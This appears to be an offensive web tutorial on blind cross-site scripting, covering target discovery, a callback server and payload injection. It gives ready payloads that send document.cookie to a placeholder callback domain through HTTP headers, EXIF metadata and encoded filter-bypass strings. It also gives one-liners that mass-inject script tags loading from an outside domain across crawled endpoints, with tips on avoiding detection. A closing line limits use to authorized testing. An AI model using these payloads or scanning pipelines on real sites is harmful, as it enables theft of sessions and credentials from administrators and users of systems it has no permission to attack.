Mastering Blind XSS
Advanced techniques for stealthy cross-site scripting attacks
Table of Contents
Blind XSS (BXSS) is a stealthy form of cross-site scripting where payloads are stored in places you can't see immediately, such as logs, admin panels, email templates, file metadata and other backend systems, and only execute later when those systems render the data. Because there's no instant feedback, it requires specialized tools and techniques.
Pro Tips
- Blind XSS payloads execute in contexts you can't see - admin panels, logs, email systems
- You need an external server to receive callbacks when payloads fire
- Patience is key - payloads may take hours, days, or weeks to execute
- Always use your own controlled server for testing
Before hunting for Blind XSS, you need the right toolset configured and ready.
Tools & Resources
Pro Tips
- Configure your Blind XSS Manager extension with your server address
- Use Burp Suite for Match & Replace rules and request inspection
- Arjun helps discover hidden parameters for bulk testing
The first step in any hunt is finding the right targets. Use custom dorks to locate various submission forms across the web that may be vulnerable to Blind XSS.
Pro Tips
- Focus on contact forms, feedback forms, and support ticket systems
- Admin panels and logging systems are prime targets
- Look for applications that store user input for later review
Before injecting payloads, you need a system to generate them and listen for their callbacks. This involves a Blind XSS server and a payload manager.
Tools & Resources
Pro Tips
- For sensitive testing, use a self-hosted solution you control
- Public services are convenient but may log your activity
- The extension helps manage multiple payloads across targets
Use Burp Suite's Match and Replace feature to automatically inject Blind XSS payloads into every request you make.
Commands
Navigate to Proxy > Settings > Match and ReplaceClick 'Add' to create a new ruleSet rule to replace User-Agent with your payloadPro Tips
- User-Agent header is commonly logged by backend systems
- Apply the same logic to Referer, Origin, Cookie, Accept, Host, X-Forwarded-For headers
- Custom headers like X-Api-Version are often rendered without sanitization
These are example HTTP request headers with Blind XSS payloads. Replace YOUR-COLLAB.DOMAIN with your actual callback server.
Commands
User-Agent: <script src="https://YOUR-COLLAB.DOMAIN"></script>Referer: https://YOUR-COLLAB.DOMAIN/?r=refX-Forwarded-For: 127.0.0.1, https://YOUR-COLLAB.DOMAIN/X-Api-Version: <svg onload="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie"></svg>Cookie: session=abc; extra=<img src=x onerror="new Image().src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie">Pro Tips
- Test multiple headers - you never know which one gets rendered
- Some applications log all headers for debugging purposes
- X-Api-Version and similar custom headers are often overlooked
For manual testing, use a User-Agent switcher browser extension to quickly inject payloads while browsing.
Pro Tips
- Set your User-Agent to a payload and browse normally
- Every page you visit will have your payload in its logs
- Useful for passive hunting while doing other tasks
Use one-liner tools and scripts to scale your Blind XSS testing across many targets automatically.
Commands
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"subfinder -d vulnweb.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameterssubfinder -d vulnweb.com | gau | bxss -payload '"><script src=https://xss.report/c/coffinxp></script>' -header "X-Forwarded-For"Pro Tips
- Subfinder + GAU combination finds lots of endpoints quickly
- BXSS tool handles payload injection at scale
- Use rate limiting to avoid detection and blocking
A clever technique is embedding XSS payloads in image metadata. When the application displays the metadata, your payload executes.
Tools & Resources
Commands
exiftool -Comment='"><img src=x onerror=alert(1)>' test.jpgexiftool -Title='"><script src=https://YOUR-COLLAB.DOMAIN></script>' test.jpgexiftool -Subject='"><svg onload=alert(1)>' test.jpgPro Tips
- Windows: Right-click > Properties > Details to edit metadata
- Target fields: Title, Subject, Comments, Author, Tags
- Upload modified images to target applications
- Works when apps display image metadata without sanitization
For highly-secured targets with strong input filtering, use encoded payloads. Create a single HTML file with dozens of payloads, each encoded differently (double URL encoding, triple URL encoding, HTML entities, etc.).
Commands
"><script src=https://YOUR-COLLAB.DOMAIN></script>'"><img src=x onerror=this.src='https://YOUR-COLLAB.DOMAIN/?c='+document.cookie><svg/onload="fetch('https://YOUR-COLLAB.DOMAIN/?c='+document.cookie)">javascript:eval(atob('BASE64_ENCODED_PAYLOAD'))%22%3E%3Cscript%20src%3Dhttps%3A%2F%2FYOUR-COLLAB.DOMAIN%3E%3C%2Fscript%3E%25%32%32%25%33%45%25%33%43%73%63%72%69%70%74...Pro Tips
- Test multiple encoding variations against WAFs
- Maintain a payload file with various bypass techniques
- Different contexts require different encodings
- HTML entity encoding, Unicode, and mixed case can bypass filters
Conclusion
Blind XSS isn't for the impatient, but it's one of the most rewarding vulnerabilities. Be everywhere: automate payloads in headers with Burp or a User-Agent switcher, scale with one-liners that crawl targets, and never underestimate hidden payloads in image EXIF data. Every technique here is a tool to ensure no input goes untested. Build a robust methodology, think creatively, and let the backend do the work for you.
For educational and authorized testing purposes only. Always obtain proper authorization before testing.